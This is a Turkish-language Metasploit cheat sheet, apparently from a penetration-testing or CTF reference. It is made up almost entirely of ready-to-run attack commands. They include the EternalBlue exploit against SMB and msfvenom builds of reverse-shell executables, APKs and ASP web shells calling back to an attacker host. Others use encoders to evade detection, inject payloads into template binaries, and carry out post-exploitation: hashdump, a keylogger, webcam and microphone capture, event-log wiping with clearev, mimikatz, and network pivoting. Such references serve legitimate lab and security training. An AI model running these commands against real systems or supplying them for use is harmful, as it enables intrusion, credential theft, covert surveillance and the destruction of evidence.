🧨 metasploit — Exploit framework
Exploit, auxiliary ve post modülleri; payload ve handler yönetimi.
msfconsole temel akış
#1
msfconsole
#2
help # genel yardım
#3
search smb type:exploit # modül arama (name, type, author, cve:XXXX)
#4
use exploit/windows/smb/ms17_010_eternalblue
#5
info # modül bilgisi
#6
show options # gerekli seçenekleri gör
#7
set RHOSTS 10.10.10.10 # hedef(ler)
#8
set RPORT 445 # hedef port
#9
set LHOST tun0 # geri bağlantı arabirimi
#10
set LPORT 4444
#11
set PAYLOAD windows/meterpreter/reverse_tcp
#12
exploit -j # arka planda (job) çalıştır
Modül türleri ve global değişkenler
#1
type: exploit | auxiliary | post | payload | encoder | nop
#2
setg LHOST 10.10.14.2; setg LPORT 4444 # global değişken
#3
unsetg LHOST; save # config kaydet
#4
back | use - | info # modüller arasında gezin
Oturum ve job yönetimi
#1
sessions # mevcut oturumlar
#2
sessions -i 1 # oturuma bağlan
#3
background # meterpreter’ı arka plana al
#4
jobs; jobs -K # job liste/öldür
#5
exploit -j; exploit -z # arka plan / oturum açık kalsın
Meterpreter — temel ve dosya işlemleri
#1
sysinfo | getuid | getpid
#2
ps | kill <pid> | migrate <pid> # süreç yönetimi
#3
pwd | ls | cd | cat dosya | edit dosya
#4
upload yerel>uzak | download uzak>yerel
#5
shell # hedefte komut kabuğu
#6
clearev # Windows event log temizle
Meterpreter — ayrıcalık, kimlik bilgisi ve ekran
#1
getprivs | getsystem # ayrıcalık yükseltme girişimi
#2
hashdump # SAM parolalarını dök
#3
keyscan_start | keyscan_stop | keyscan_dump # keylogger
#4
enumdesktops | getdesktop | setdesktop # masaüstü yönetimi
#5
screenshot | record_mic | webcam_list | webcam_snap
Ağ ve pivot
#1
ipconfig # arayüzleri göster
#2
route # route tablosu
#3
portfwd add -l 4444 -p 80 -r 127.0.0.1 # yerel 4444 -> hedef 80
#4
portfwd list | portfwd delete -l 4444
#5
run autoroute -s 10.10.0.0/16 # pivot için otomatik yön
Msfvenom — yaygın kullanım
#1
msfvenom -l payloads # payload listesi
#2
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe
#3
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f elf -o shell.elf
#4
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -o app.apk
#5
msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.14.2 LPORT=443 -f asp -o shell.asp
Msfvenom — seçenekler (özet)
#1
-p <payload> # payload seç
#2
-f <format> # çıktı biçimi: exe, elf, apk, war, aspx, raw, c, python
#3
-e <encoder> # encode: x86/shikata_ga_nai ...
#4
-i <n> # encode tekrar sayısı
#5
-a <arch> # mimari: x86, x64, armle
#6
--platform windows # platform
#7
-s <space> # max payload boyutu
#8
-b "\x00\x0a\x0d" # yasak karakterler
#9
-x <şablon> -k # şablon ikiliye enjekte (ekte çalışsın)
#10
-o <dosya> # çıktı dosyası
Handler (dinleyici) kurulum
#1
use exploit/multi/handler
#2
set PAYLOAD windows/meterpreter/reverse_tcp
#3
set LHOST 0.0.0.0; set LPORT 4444
#4
set ExitOnSession false # birden fazla oturum
#5
run -j
Kaynak ve çıktı
#1
resource script.rc # komutları toplu çalıştır
#2
spool loot.txt # konsol çıktısını kaydet
#3
creds | loot | services | hosts # veritabanı komutları
#4
db_nmap -sV -p- 10.10.10.0/24 # entegre nmap taraması
Örnek senaryolar
#1
# 1) Windows reverse_tcp ve oturumu arka planda alma
#2
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o shell.exe
#3
use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4444; run -j
#4
# 2) Linux hedefte pivot ve port yönlendirme
#5
sessions -i 1; run autoroute -s 10.10.0.0/16; portfwd add -l 8080 -p 80 -r 10.10.0.5
#6
# 3) Yetki yükseltme ve hash dökümü
#7
getsystem; hashdump; load kiwi # mimikatz/kiwi eklentisi